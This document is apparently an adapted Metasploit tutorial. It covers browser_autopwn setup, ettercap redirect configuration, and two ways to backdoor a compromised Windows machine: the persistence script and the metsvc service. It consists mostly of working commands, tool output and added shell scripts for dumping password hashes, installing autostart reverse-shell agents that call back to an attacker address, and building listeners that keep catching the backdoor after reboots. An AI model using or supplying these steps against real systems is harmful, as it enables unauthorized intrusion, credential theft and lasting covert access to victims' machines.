search autopwn


    search autopwn

    use server/browser_autopwn
    show options
    set LHOST 
    set SRVPORT
    set URIPATH /
    show options

Modify the etter.conf file (ettercap's configuration). In the Linux part of its redirection-commands section there are two commented-out pairs of redir_command_on / redir_command_off lines, one headed "# if you use ipchains:" and one headed "# if you use iptables:". Uncomment the pair for the firewall the attacking box actually runs, which on any current Linux is iptables (ipchains is the 2.2-kernel-era tool), so that ettercap can install the port redirect it needs:
    if you use ipchains
    if you use iptables
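The two setup steps above, as an added shell example that is not part of the original post: one function writes an msfconsole resource file reproducing the browser_autopwn commands (the attacker address 192.168.1.139 and the server port 8080 are assumed values), and another uncomments only the iptables redir_command pair in a copy of etter.conf. The etter.conf excerpt is constructed here so the edit can be tried offline; the real file's line text is the same.

```shell
#!/bin/sh
# Added example, not from the original post. Assumed values: attacker
# address 192.168.1.139, autopwn server port 8080.

# Write a resource file that reproduces the browser_autopwn steps, so the
# server comes up with:  msfconsole -q -r autopwn.rc
write_autopwn_rc() {
    out="$1" lhost="$2" srvport="$3"
    cat > "$out" <<EOF
use server/browser_autopwn
set LHOST $lhost
set SRVPORT $srvport
set URIPATH /
run
EOF
}

# Constructed excerpt of etter.conf's Linux redirection block, written to
# the given path. Only the "if you use iptables" pair should end up active.
write_sample_etter_conf() {
    cat > "$1" <<'EOF'
[privs]
ec_uid = 65534
ec_gid = 65534

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

EOF
}

# Strip the leading '#' from redir_command_on/off, but only inside the
# block that starts at "# if you use iptables:" and ends at the next blank
# line, so the ipchains pair stays commented out. A .bak copy is kept.
enable_iptables_redir() {
    sed -i.bak '/^# if you use iptables/,/^$/ s/^\([[:space:]]*\)#redir_command_/\1redir_command_/' "$1"
}

# Return 0 when exactly one pair is live and it is the iptables pair,
# non-zero otherwise (nothing enabled, or the wrong pair enabled).
redir_is_enabled() {
    live=$(grep -c '^[[:space:]]*redir_command_o' "$1" || true)
    ipt=$(grep -c '^[[:space:]]*redir_command_o[nf]* = "iptables' "$1" || true)
    [ "$live" -eq 2 ] && [ "$ipt" -eq 2 ]
}
```

Run enable_iptables_redir against /etc/ettercap/etter.conf (or /etc/etter.conf on older installs) rather than the sample, then redir_is_enabled on the same file before starting ettercap; the sed range is deliberately narrow so that re-running it is harmless.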
     
     
     
     
     
     
     
After obtaining a session:

    run hashdump

    run persistence -X -i 5 -p 445 -r 192.168.1.106

(-X installs the agent to start at system boot, which needs an elevated session; -i 5 is the reconnect interval in seconds; -p and -r are the port and address of the attacker's handler.)
     
     
Metasploit: two ways to build a backdoor

1. Meterpreter's built-in scripts

Method 1: run persistence

Use run persistence -h to list the options:
     
    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
    [*] Running Persistance Script
    [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443
    [*] Persistent agent script is 609496 bytes long
    [+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    [*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    [+] Agent executed with PID 3272
    [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
    [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY

As the output shows, autostart is achieved by adding a registry value (under the current user's Run key here, because -U was given), and what gets launched is the VBS script backdoor dropped in the Windows TEMP directory. The cleanup resource file named above removes that script and the registry value again.
     
Connect to it:

    msf > use exploit/multi/handler
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp
    payload => windows/metsvc_bind_tcp
    msf  exploit(handler) > set LHOST 192.168.1.139
    LHOST => 192.168.1.139
    msf  exploit(handler) > set LPORT 443
    LPORT => 443
    msf  exploit(handler) > exploit

    [*] Started bind handler
    [*] Starting the payload handler...

Nothing is started by default; after the target reboots, a meterpreter shell is obtained successfully.

Caveat on the handler above: the agent installed by run persistence is windows/meterpreter/reverse_tcp and calls back to 192.168.1.139:443, so the listener has to be configured with set payload windows/meterpreter/reverse_tcp and the same LHOST/LPORT. windows/metsvc_bind_tcp is a bind payload (hence "Started bind handler") and is the right choice for the metsvc service in method 2, not here; with it set, the reverse callback has nothing to land on.
     
Method 2: run metsvc

Run the metsvc script:

    meterpreter > run metsvc -A
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...
    [*]  >> Uploading metsrv.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
         * Installing service metsvc
         * Starting service
    Service metsvc successfully installed.

    [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

A new Windows service set to start automatically is created (image name metsvc.exe, service name metsvc) and listens on TCP port 31337; -A makes the script start a matching handler and connect to it right away. To connect to the backdoor later:
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LPORT 31337 
    LPORT => 31337 
    msf  exploit(handler) > set RHOST 192.168.1.108 
    RHOST => 192.168.1.108 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler... 
     
    meterpreter >
Connected successfully.
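A handler generator covering both backdoors, as an added shell example that is not code from the original post. It writes the multi/handler resource file that matches each agent: the reverse_tcp agent from run persistence needs a reverse handler keyed on the attacker's LHOST, while the metsvc service needs the bind payload keyed on the victim's RHOST. For the reverse case it also sets ExitOnSession false and backgrounds the handler with exploit -j, so the listener keeps accepting the agent's periodic reconnects and survives later reboots. The addresses and ports are the ones used on this page.

```shell
#!/bin/sh
# Added example, not from the original post. Builds the msfconsole handler
# that matches each backdoor; the values used below are the page's own.

# Map a backdoor type to the handler payload it needs. Returns non-zero for
# anything else so a typo cannot silently produce the wrong listener.
handler_payload_for() {
    case "$1" in
        persistence) echo windows/meterpreter/reverse_tcp ;;   # agent calls back
        metsvc)      echo windows/metsvc_bind_tcp ;;           # service listens
        *) return 1 ;;
    esac
}

# write_handler_rc <persistence|metsvc> <ip> <port> <outfile>
# persistence: ip is the attacker's LHOST (the -r value), port the -p value;
#              ExitOnSession false + exploit -j keep the listener up for the
#              agent's retries and for callbacks after reboots.
# metsvc:      ip is the victim's RHOST, port the service port (31337);
#              a bind handler connects out once, so a plain exploit suffices.
write_handler_rc() {
    kind="$1" ip="$2" port="$3" out="$4"
    payload=$(handler_payload_for "$kind") || return 1
    case "$kind" in
        persistence)
            addr_opt="LHOST"
            tail_cmds='set ExitOnSession false
exploit -j' ;;
        metsvc)
            addr_opt="RHOST"
            tail_cmds='exploit' ;;
    esac
    cat > "$out" <<EOF
use exploit/multi/handler
set payload $payload
set $addr_opt $ip
set LPORT $port
$tail_cmds
EOF
}
```

Usage: write_handler_rc persistence 192.168.1.139 443 handler.rc followed by msfconsole -q -r handler.rc for the method 1 agent, and write_handler_rc metsvc 192.168.1.108 31337 handler.rc for the method 2 service.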
Original post: https://www.cnblogs.com/journeyIT/p/8259946.html